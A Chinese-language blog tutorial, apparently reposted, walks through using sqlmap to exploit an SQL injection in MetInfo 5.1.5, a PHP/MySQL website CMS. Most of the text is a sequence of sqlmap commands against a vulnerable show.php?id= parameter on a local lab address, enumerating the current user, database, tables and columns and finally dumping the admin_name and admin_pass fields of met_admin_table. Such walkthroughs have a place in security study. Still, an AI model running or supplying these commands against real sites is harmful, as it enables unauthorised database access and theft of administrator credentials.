metinfo mysql off_利用Sqlmap测试MetInfo企业网站管理系统MySql注入
上次叉叉講了Sqlmap簡單注入(access數(shù)據(jù)庫)教程,這次咱說說MySql數(shù)據(jù)庫
MetInfo,是一款強(qiáng)大的企業(yè)網(wǎng)站管理系統(tǒng),采用PHP+Mysql架構(gòu)。
叉叉下載的是MetInfo 5.1.5的免費(fèi)版本,咱不是大拿,不會(huì)分析源碼,直接丟到WVS里面掃
發(fā)現(xiàn)注入點(diǎn),打開我們的backtrack5,運(yùn)行Sqlmap神器
獲取當(dāng)前用戶名稱,輸入命令:python sqlmap.py -u?http://192.168.121.1/MetInfo/about/show.php?id=22?–current-user
獲取當(dāng)前數(shù)據(jù)庫名稱,輸入命令:python sqlmap.py -u?http://192.168.121.1/MetInfo/about/show.php?id=22?–current-db
得到數(shù)據(jù)庫名為:met
列數(shù)據(jù)庫表名,輸入命令:python sqlmap.py -u?http://192.168.121.1/MetInfo/about/show.php?id=22?–tables -D “met“成功得到”met”數(shù)據(jù)庫的表名如下圖:
列admin表的字段,輸入命令:python sqlmap.py -u?http://192.168.121.1/MetInfo/about/show.php?id=22?–columns ?-T “met_admin_table“ -D “met”
上圖顯示成功獲取met_admin_table表的字段,下面dump出admin_name和admin_pass內(nèi)容,輸入命令:python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –dump -C “admin_pass,admin_name” -T “met_admin_table” -D “met”
如您對本文有疑問或者有任何想說的,請點(diǎn)擊進(jìn)行留言回復(fù),萬千網(wǎng)友為您解惑!
創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎(jiǎng)勵(lì)來咯,堅(jiān)持創(chuàng)作打卡瓜分現(xiàn)金大獎(jiǎng)總結(jié)
以上是生活随笔為你收集整理的metinfo mysql off_利用Sqlmap测试MetInfo企业网站管理系统MySql注入的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: IAR版本选择
- 下一篇: linux cmake编译源码,linu